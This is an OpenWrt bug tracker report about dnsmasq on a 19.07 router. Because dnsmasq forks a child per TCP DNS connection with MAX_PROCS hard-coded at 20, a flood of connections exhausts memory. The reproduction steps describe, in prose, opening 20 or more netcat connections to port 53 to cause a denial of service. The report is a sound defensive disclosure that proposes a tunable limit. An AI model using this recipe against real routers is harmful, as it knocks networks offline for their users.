OpenWrt/LEDE Project

  • Status Unconfirmed
  • Percent Complete
    0%
  • Task Type Bug Report
  • Category Base system
  • Assigned To No-one
  • Operating System All
  • Severity High
  • Priority Very Low
  • Reported Version openwrt-19.07
  • Due in Version Undecided
  • Due Date Undecided
  • Private
Attached to Project: OpenWrt/LEDE Project
Opened by Brian J. Murrell - 06.09.2021

FS#4011 - TCP queries to dnsmasq can cause OOM and DoS attack

Supply the following if possible:
- Device problem occurs on tplink,tl-wdr4300-v1
- Software versions of OpenWrt/LEDE release, packages, etc. 19.07.8
- Steps to reproduce

Use a tool like netcat to open many (i.e 20+) TCP connections to port 53, simulating TCP dns queries
Observe how dnsmasq forks for each connection
Observe how at some point enough dnsmasq children are running that the kernel starts OOMing

This is a quick/easy demonstration on how simply an OpenWRT router can be DoS attacked.

There is a hard coded MAX_PROCS which defaults to 20. This clearly is too high for resource constrained systems like OpenWRT routers.

There is a discussion of this problem on the dnsmasq ML @ https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2021q1/014907.html which includes a patch to make MAX_PROCS a run-time tunable. This could be used by OpenWRT to scale up/down the MAX_PROCS value based on the size of system it’s running on.

It could/should be user-overridable in case he/she knows better what the value should be than any attempt by OpenWRT to scale on a given router.

 


Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing